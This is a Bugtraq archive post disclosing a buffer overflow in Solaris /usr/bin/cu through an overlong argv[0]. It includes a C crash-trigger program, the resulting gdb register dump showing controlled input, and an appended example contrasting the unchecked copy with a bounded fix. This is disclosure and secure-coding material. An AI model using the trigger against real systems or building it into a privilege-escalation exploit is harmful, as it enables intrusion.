Bugtraq mailing list archives
Re: Solaris /usr/bin/cu Vulnerability
From: Tomas Cibulka <shock () HQ ALERT SK>
Date: Thu, 18 Jan 2001 20:19:10 +0100
Hi,
Solaris 2.8 seems to be affected by this bug as well.
But you can gain only uucp rights in the default installation.
bye
On Wed, Jan 17, 2001 at 04:34:52PM -0300, Pablo Sor wrote:
Description
The /usr/bin/cu command contains a buffer overflow. The problem occurs when it copies its own name (argv[0]) to an internal variable without checking its length, and this causes the overflow.
Vulnerable Versions
Sun Solaris 2.4
Sun Solaris 2.5
Sun Solaris 2.5.1
Sun Solaris 2.6
Sun Solaris 2.7
(Don't know about Solaris 2.8)
Technical Description
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/* Runs /usr/bin/cu with an argv[0] of the requested length, filled with 'A' (0x41) */
int main(int argc, char **argv)
{
char *buf;
int len;
if (argc != 2) { fprintf(stderr, "usage: %s <argv0-length>\n", argv[0]); return 1; }
len = atoi(argv[1]);
buf = (char *) malloc(len * sizeof(char));
memset(buf, 0x41, len - 1);
buf[len - 1] = 0;
execl("/usr/bin/cu", buf, (char *) 0);
perror("execl");
return 1;
}
$ uname -a
SunOS tomy 5.5.1 Generic_103640-34 sun4m sparc SUNW,SPARCstation-5
$ ./cu-demo 4000
Segmentation Fault (core dumped)
$ gdb ./cu-demo --core=core
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.5.1"...
warning: core file may not match specified executable file.
Core was generated by `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation Fault.
#0 0xef62901c in ?? ()
(gdb) info registers
g0 0x0 0
g1 0xef628d24 -278754012
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x137a4 79780
o1 0xef792a88 -277271928
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0xef792a88 -277271928
sp 0xefffecb0 -268440400
o7 0x31b48 203592
l0 0x7efefeff 2130640639
l1 0x81010100 -2130640640
l2 0xff000000 -16777216
l3 0xff0000 16711680
l4 0xff00 65280
l5 0x81010100 -2130640640
l6 0x7 7
l7 0xef7927d4 -277272620
i0 0x39000 233472
i1 0xeffffec4 -268435772
i2 0x38088 229512
i3 0x41414141 1094795585
i4 0x2f 47
i5 0x0 0
fp 0xefffecf0 -268440336
i7 0x137a4 79780
y 0x0 0
psr 0x4400086 71303302
wim 0x0 0
tbr 0x0 0
pc 0xef62901c -278753252
npc 0xef628ffc -278753284
fpsr 0x0 0
cpsr 0x0 0
Pablo Sor
psor () afip gov ar
--
------------------------------------------------------------------------
/| Tomas Cibulka
'o.O'
=(___)= E-MAIL : shock () alert sk
U URL : hq.alert.sk/~shock - that's my www page
PGP KEY : finger shock () hq alert sk
-----------------------------------------------------------------------
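The bug class described in the quoted post, a program copying its own argv[0] into a fixed-size internal buffer, shown as an added example (not code from the post, from Sun, or from cu itself). The unchecked form is kept only for comparison next to a bounded one that refuses an oversized name; the buffer size NAME_MAX_LEN and all function names are assumptions, since the post does not give cu's real buffer size.

```c
/*
 * Added example: unchecked argv[0] copy next to a bounded one.
 * NAME_MAX_LEN and the function names are assumptions, not values from cu.
 */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define NAME_MAX_LEN 64   /* assumed size of the internal name buffer */

/* Unchecked form (the bug class in the post): strcpy does not know how big
 * 'dst' is, so an argv[0] longer than NAME_MAX_LEN-1 runs past the buffer
 * onto whatever follows it on the stack. Kept for comparison only. */
void set_progname_unchecked(char dst[NAME_MAX_LEN], const char *argv0)
{
    strcpy(dst, argv0);
}

/* Bounded form: copies argv0 into dst only if it fits, NUL included.
 * Returns 0 on success, -1 if the name is too long (dst is then left empty). */
int set_progname_checked(char *dst, size_t dstlen, const char *argv0)
{
    size_t n;
    if (dst == NULL || dstlen == 0 || argv0 == NULL)
        return -1;
    n = strlen(argv0);
    if (n >= dstlen) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, argv0, n + 1);
    return 0;
}

/* Many programs only want the last path component of argv[0]. Trimming to it
 * makes a long directory prefix harmless, but the length check above still
 * has to stay, because the final component can itself be oversized. */
const char *progname_basename(const char *argv0)
{
    const char *slash = strrchr(argv0, '/');
    return slash ? slash + 1 : argv0;
}

/* Exercises the bounded copy with an argv[0] of 'len' 'A's, the same shape
 * the post's demo hands to cu. Returns the result of set_progname_checked. */
int try_name_of_length(size_t len)
{
    char big[8192];                 /* constructed input, not real argv[0] */
    char name[NAME_MAX_LEN];
    if (len >= sizeof big)
        return -1;
    memset(big, 'A', len);
    big[len] = '\0';
    return set_progname_checked(name, sizeof name, big);
}

int main(int argc, char **argv)
{
    char name[NAME_MAX_LEN];
    (void)argc;
    if (set_progname_checked(name, sizeof name, progname_basename(argv[0])) != 0) {
        fprintf(stderr, "program name too long, refusing to continue\n");
        return 1;
    }
    printf("running as %s\n", name);
    return 0;
}
```

With a 4000-byte argv[0] like the one in the demo, the bounded version returns -1 and the program exits cleanly instead of faulting in libc as the register dump above shows (i3 holding 0x41414141). For a setuid program such as cu, refusing and exiting is the right reaction; silently truncating would still let the name reach code that expects a sane length.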
